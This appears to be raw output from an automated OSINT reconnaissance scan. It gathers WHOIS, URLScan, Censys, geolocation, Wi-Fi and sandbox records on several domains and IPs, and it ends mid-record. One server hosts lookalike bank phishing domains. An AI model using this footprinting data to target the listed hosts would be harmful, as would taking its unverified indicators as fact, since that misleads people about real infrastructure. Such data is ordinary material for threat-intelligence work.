| 2023-05-12 03:01:24 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.231): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:55:27 | Raw Data from RIRs | No | URLScan.io | 1 | 0 | 1 | 0 | None | [{u'sort': [1679937961810, u'be713cda-cf3f-49bd-91b6-e8517dc017bf'], u'task': {u'domain': u'kekw.battleb0t.xyz', u'uuid': u'be713cda-cf3f-49bd-91b6-e8517dc017bf', u'tags': [u'falconsandbox'], u'url': u'http://kekw.battleb0t.xyz/jar', u'visibility': u'public', u'time': u'2023-03-27T17:26:01.810Z', u'apexDomain': u'battleb0t.xyz', u'method': u'api'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 0, u'encodedDataLength': 0, u'requests': 1, u'dataLength': 0}, u'screenshot': u'https://urlscan.io/screenshots/be713cda-cf3f-49bd-91b6-e8517dc017bf.png', u'_score': None, u'result': u'https://urlscan.io/api/v1/result/be713cda-cf3f-49bd-91b6-e8517dc017bf/', u'_id': u'be713cda-cf3f-49bd-91b6-e8517dc017bf', u'page': {u'url': u'http://kekw.battleb0t.xyz/jar', u'domain': u'kekw.battleb0t.xyz', u'apexDomain': u'battleb0t.xyz'}}, {u'sort': [1679768811151, u'4b027c18-4e16-4bfc-8793-6295946cceb7'], u'task': {u'domain': u'kekw.battleb0t.xyz', u'uuid': u'4b027c18-4e16-4bfc-8793-6295946cceb7', u'tags': [u'https://phish.report', u'@phish_report'], u'url': u'https://kekw.battleb0t.xyz/jar', u'visibility': u'public', u'time': u'2023-03-25T18:26:51.151Z', u'apexDomain': u'battleb0t.xyz', u'method': u'api'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 84, u'requests': 1, u'dataLength': 11}, u'screenshot': u'https://urlscan.io/screenshots/4b027c18-4e16-4bfc-8793-6295946cceb7.png', u'_score': None, u'result': u'https://urlscan.io/api/v1/result/4b027c18-4e16-4bfc-8793-6295946cceb7/', u'_id': u'4b027c18-4e16-4bfc-8793-6295946cceb7', u'page': {u'mimeType': u'text/plain', u'status': u'502', u'domain': u'kekw.battleb0t.xyz', u'url': u'https://kekw.battleb0t.xyz/jar', u'country': u'DE', u'tlsValidFrom': u'2023-03-23T21:24:09.000Z', u'asnname': u'DIGITALOCEAN-ASN, US', u'tlsIssuer': u'Easypanel', u'tlsValidDays': 3650, u'ip': u'64.226.81.43', u'apexDomain': u'battleb0t.xyz', u'tlsAgeDays': 1, u'asn': u'AS14061'}}, {u'sort': [1678573216685, u'ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea'], u'task': {u'domain': u'kekw.battleb0t.xyz', u'uuid': u'ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea', u'tags': [u'https://phish.report', u'@phish_report'], u'url': u'http://kekw.battleb0t.xyz/', u'visibility': u'public', u'time': u'2023-03-11T22:20:16.685Z', u'apexDomain': u'battleb0t.xyz', u'method': u'api'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 300, u'requests': 1, u'dataLength': 207}, u'screenshot': u'https://urlscan.io/screenshots/ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea.png', u'_score': None, u'result': u'https://urlscan.io/api/v1/result/ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea/', u'_id': u'ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea', u'page': {u'mimeType': u'text/html', u'status': u'404', u'domain': u'kekw.battleb0t.xyz', u'title': u'404 Not Found', u'url': u'https://kekw.battleb0t.xyz/', u'ip': u'46.101.229.70', u'tlsValidFrom': u'2023-01-27T17:58:43.000Z', u'asnname': u'DIGITALOCEAN-ASN, US', u'server': u'Werkzeug/2.2.2 Python/3.10.9', u'tlsIssuer': u'R3', u'tlsValidDays': 89, u'country': u'DE', u'redirected': u'https-only', u'apexDomain': u'battleb0t.xyz', u'tlsAgeDays': 43, u'asn': u'AS14061'}}, {u'sort': [1678573191537, u'd8289b22-dbac-48d2-856a-e99fe632406b'], u'task': {u'domain': u'kekw.battleb0t.xyz', u'uuid': u'd8289b22-dbac-48d2-856a-e99fe632406b', u'tags': [u'https://phish.report', u'@phish_report'], u'url': u'http://kekw.battleb0t.xyz/', u'visibility': u'public', u'time': u'2023-03-11T22:19:51.537Z', u'apexDomain': u'battleb0t.xyz', u'method': u'api'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 300, u'requests': 1, u'dataLength': 207}, u'screenshot': u'https://urlscan.io/screenshots/d8289b22-dbac-48d2-856a-e99fe632406b.png', u'_score': None, u'result': u'https://urlscan.io/api/v1/result/d8289b22-dbac-48d2-856a-e99fe632406b/', u'_id': u'd8289b22-dbac-48d2-856a-e99fe632406b', u'page': {u'mimeType': u'text/html', u'status': u'404', u'domain': u'kekw.battleb0t.xyz', u'title': u'404 Not Found', u'url': u'https://kekw.battleb0t.xyz/', u'ip': u'46.101.229.70', u'tlsValidFrom': u'2023-01-27T17:58:43.000Z', u'asnname': u'DIGITALOCEAN-ASN, US', u'server': u'Werkzeug/2.2.2 Python/3.10.9', u'tlsIssuer': u'R3', u'tlsValidDays': 89, u'country': u'DE', u'redirected': u'https-only', u'apexDomain': u'battleb0t.xyz', u'tlsAgeDays': 43, u'asn': u'AS14061'}}] | battleb0t.xyz |
| 2023-05-12 03:31:30 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 6 | 0 | None | abuse@nicproxy.com | Domain Name: KEYUBU.COM
Registry Domain ID: 2292564494_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.nicproxy.com
Registrar URL: http://https://nicproxy.com/
Updated Date: 2022-07-15T17:58:33Z
Creation Date: 2018-07-31T21:39:32Z
Registry Expiry Date: 2023-07-31T21:39:32Z
Registrar: Nics Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90 212 213 2963
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: KEYUBU.COM
Registry Domain ID : 2292564494_DOMAIN_COM-VRSN
Registrar WHOIS Server : whois.nicproxy.com
Registrar URL: http://www.nicproxy.com
Updated Date: 2022-07-15T17:58:33Z
Creation Date: 2018-07-31T21:39:32Z
Registrar Registration Expiration Date: 2023-07-31T21:39:32Z
Registrar: NICS Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90.2122132963
Reseller: CIZGI TELEKOMUNIKASYON A.S - NATRO
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: CID-Redacted for Privacy
Registrant Name: Redacted for Privacy
Registrant Organization: Redacted for Privacy
Registrant Street: Redacted for Privacy
Registrant City: ADANA
Registrant State / Province: Redacted for Privacy
Registrant Postal Code: Redacted for Privacy
Registrant Country: TR
Registrant Phone: Redacted for Privacy
Registrant Phone Ext: Redacted for Privacy
Registrant Fax: Redacted for Privacy
Registrant Fax Ext: Redacted for Privacy
Registrant Email: https://whoisshelter.nicproxy.com/?d=KEYUBU.COM
Registry Admin ID: CID-Redacted for Privacy
Admin Name: Redacted for Privacy
Admin Organization: Redacted for Privacy
Admin Street: Redacted for Privacy
Admin City: Redacted for Privacy
Admin State / Province: Redacted for Privacy
Admin Postal Code: Redacted for Privacy
Admin Country: Redacted for Privacy
Admin Phone: Redacted for Privacy
Admin Phone Ext: Redacted for Privacy
Admin Fax: Redacted for Privacy
Admin Fax Ext: Redacted for Privacy
Admin Email: Redacted for Privacy
Registry Tech ID: CID-Redacted for Privacy
Tech Name: Redacted for Privacy
Tech Organization: Redacted for Privacy
Tech Street: Redacted for Privacy
Tech City: Redacted for Privacy
Tech State / Province: Redacted for Privacy
Tech Postal Code: Redacted for Privacy
Tech Country: Redacted for Privacy
Tech Phone: Redacted for Privacy
Tech Phone Ext: Redacted for Privacy
Tech Fax: Redacted for Privacy
Tech Fax Ext: Redacted for Privacy
Tech Email: Redacted for Privacy
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T03:12:03Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
IMPORTANT: Port43 will provide the ICANN-required minimum data set per
ICANN Temporary Specification, adopted 04 Jun 2018.
Visit whois.nicproxy.com to look up contact data for domains
not covered by GDPR policy.
!****************************************************************************!
NICS Telekomunikasyon A.S., uluslararasi alan adi kayit otoritesi olan ICANN
onayli bir alan adi kayit firmasidir.
Bu alan adina ait web sitesinin icerigi ya da yayinlanmasiyla hicbir sekilde ilgisi yoktur.
Sadece, ICANN kurallari cercevesinde alan adinin kayit edilmesine aracilik yapmaktadir.
Bu alan adi sahibinin kayit sirasinda verdigi bilgiler yukaridaki gibidir.
NICS Telekomunikasyon A.S., bu bilgilerin dogrulugunu garanti edemez.
Daha fazla bilgi almak icin info [at] nicproxy.com adresine yazabilirsiniz.
!*****************************************************************************!
The data in the WHOIS database of NICS Telekomunikasyon A.S. is provided by
Nics Telekomunikasyon Ltd. for information purposes, and to assist persons in
obtaining information about or related to domain name registration
records. NICS Telekomunikasyon A.S. does not guarantee its accuracy.
By submitting a WHOIS query, you agree that you will use this data
only for lawful purposes and that, under no circumstances, you will
use this data to
1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via E-mail(spam) or
2) enable high volume, automated, electronic processes that apply
to Nics Telekomunikasyon Ltd. or its systems.
Nics Telekomunikasyon Ltd. reserves the right to modify these terms.
By submitting this query, you agree to abide by this policy.
NICProxy Whois Server Ver.1.2.2
|
| 2023-05-12 03:00:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | aes128-gcm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T07:25:44.787Z", "ip": "46.101.229.70", "labels": ["remote-access"], "location_updated_at": "2023-05-01T12:20:02.406356Z", "autonomous_system_updated_at": "2023-05-01T12:20:02.407454Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"www3citi5ensbnk01.nerdpol.ovh": {"record_type": "A", "resolved_at": "2023-05-08T21:52:09.615214562Z"}, "www3citizensbnk01.ddns.net": {"record_type": "A", "resolved_at": "2023-04-03T07:30:40.764584949Z"}, "www3citlzensbnk.ddns.net": {"record_type": "A", "resolved_at": "2023-04-23T19:19:28.631638390Z"}, "chainsyncpages.ddns.net": {"record_type": "A", "resolved_at": "2023-04-05T19:58:37.967204478Z"}, "mail.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-05-03T14:09:55.384272288Z"}, "jnbt05.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-10T17:13:22.939829997Z"}, "intelligent-euclid.46-101-229-70.plesk.page": {"record_type": "A", "resolved_at": "2023-04-28T22:08:15.278436745Z"}, "www.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.707553225Z"}, "46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.520320906Z"}}, "names": ["chainsyncpages.ddns.net", "www3citi5ensbnk01.nerdpol.ovh", "www3citizensbnk01.ddns.net", "www3citlzensbnk.ddns.net", "www.46-101-229-70.cprapid.com", "46-101-229-70.cprapid.com", "intelligent-euclid.46-101-229-70.plesk.page", "jnbt05.easypanel.host", "mail.46-101-229-70.cprapid.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T07:25:44.640117776Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "28960,64,true,MSTNW,1460,false,false", "os": "Ubuntu / Debian / CentOS", "id": 72}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "654b926728b59e31856ca456546380aae9ad6f0105be964db40d456c35d8474b", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "b/8s4eFX87LHgM34ZW3g9GyhRKNQyQUUsPt17LQ/ZJc=", "x": "OF+EuiYliuprX40ENBhAbc+GOunuKTpVTjg/1oXm5JM=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}], "autonomous_system": {"bgp_prefix": "46.101.128.0/17", "country_code": "US", "asn": 14061, "name": "DIGITALOCEAN-ASN", "description": "DIGITALOCEAN-ASN"}} |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:02:2D:00:21:01) | 37.780462,-122.390564 |
| 2023-05-12 02:55:11 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | PHP 7.4.33 | 87.248.157.102 |
| 2023-05-12 03:09:44 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 129.97.148.34.bc.googleusercontent.com | 34.148.97.129 |
| 2023-05-12 03:01:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.120): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.207): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:12:10 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 5 | 0 | None | Information technology companies of England | baffin.netcraft.com |
| 2023-05-12 03:11:19 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'Bursa', u'security': {u'is_vpn': False}, u'city_geoname_id': 750269, u'region_geoname_id': 750268, u'country': u'Turkey', u'region': u'Bursa', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'Dgn Teknoloji A.s.', u'isp_name': u'Shiraz-University', u'organization_name': u'Shiraz University', u'autonomous_system_number': 43260}, u'continent_code': u'AS', u'currency': {u'currency_name': u'Lira', u'currency_code': u'TRY'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/TR_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/TR_flag.png', u'unicode': u'U+1F1F9 U+1F1F7', u'emoji': u'\U0001f1f9\U0001f1f7'}, u'postal_code': u'16350', u'longitude': 29.0398, u'country_code': u'TR', u'timezone': {u'abbreviation': u'+03', u'gmt_offset': 3, u'is_dst': False, u'name': u'Europe/Istanbul', u'current_time': u'06:11:18'}, u'latitude': 40.2024, u'country_geoname_id': 298795, u'continent_geoname_id': 6255147, u'country_is_eu': False, u'ip_address': u'87.248.157.102', u'continent': u'Asia', u'region_iso_code': u'16'} | 87.248.157.102 |
| 2023-05-12 02:44:15 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:4700:3037::6815:470e | fluid.battleb0t.xyz |
| 2023-05-12 02:54:27 | BGP AS Membership | No | Censys | 0 | 0 | 4 | 0 | None | 14618 | 2600:1f18:2489:8202::c8 |
| 2023-05-12 02:55:15 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | nginx nginx 1.18.0 | 165.232.113.85 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CableWiFi (Net ID: 00:0D:67:37:7A:7B) | 39.0469, -77.4903 |
| 2023-05-12 03:02:26 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Cloudflare | www.ayhu.xyz |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | BIGO Live (Category: gaming)
https://www.bigo.tv/user/ayshoo | ayshoo |
| 2023-05-12 02:54:44 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H06KNWSV7RTZ7MSA7BNCK843
Date: <REDACTED>
Content-Length: 0
| 35.229.48.116 |
| 2023-05-12 02:50:27 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 25, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://www.activestate.com/products/perl/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:6456:304:WilStaging_02"\n "Local\\SM0:6456:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:6456:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"13.227.74.81:443"\n "138.91.254.96:443"\n "13.227.74.26:443"\n "142.250.189.174:443"\n "104.16.184.65:443"\n "185.199.108.153:443"\n "104.17.211.243:443"\n "142.251.32.34:443"\n "104.17.212.243:443"\n "23.55.103.97:443"\n "13.227.74.25:443"\n "13.227.74.111:443"\n "151.101.1.131:443"\n "104.18.135.59:443"\n "13.227.74.121:443"\n "157.240.22.25:443"\n "142.250.101.156:443"\n "216.239.38.181:443"\n "54.219.220.207:443"\n "13.227.74.73:443"\n "13.227.74.69:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"59e3fd97d0784951aaf980d5dbb23a79.events.ubembed.com"\n "59e3fd97d0784951aaf980d5dbb23a79.js.ubembed.com"\n "59e3fd97d0784951aaf980d5dbb23a79.pages.ubembed.com"\n "activestate.github.io"\n "ajax.googleapis.com"\n "analytics.google.com"\n "api.edgeoffer.microsoft.com"\n "api.hubspot.com"\n "assets.ubembed.com"\n "builder-assets.unbounce.com"\n "cdn.activestate.com"\n "cdn.heapanalytics.com"\n "cdn.linkedin.oribi.io"\n "connect.facebook.net"\n "d2xxq4ijfwetlm.cloudfront.net"\n "epsilon.6sense.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "forms-na1.hsforms.com"\n "forms.hscollectedforms.net"\n "forms.hsforms.com"\n "googleads.g.doubleclick.net"\n "heapanalytics.com"\n "js.hs-analytics.net"\n "js.hs-banner.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "px.ads.linkedin.com" (Indicator: "dir "; File: "PCAP")\n Found string "www.facebook.com" (Indicator: "dir "; File: "PCAP")\n Found string "www.linkedin.com" (Indicator: "dir "; File: "PCAP")\n Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""beautiiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""beautyandwhiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""bellagracehealthscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""belleandbubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""beyondblessedscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00005804]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00005804]\n "wallet-stable.json" has type "ASCII text"- Location: [%TEMP%\\5804_613645668\\json\\wallet\\wallet-stable.json]- [targetUID: 00000000-00005804]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\5804_613645668\\wallet.bundle.js]- [targetUID: 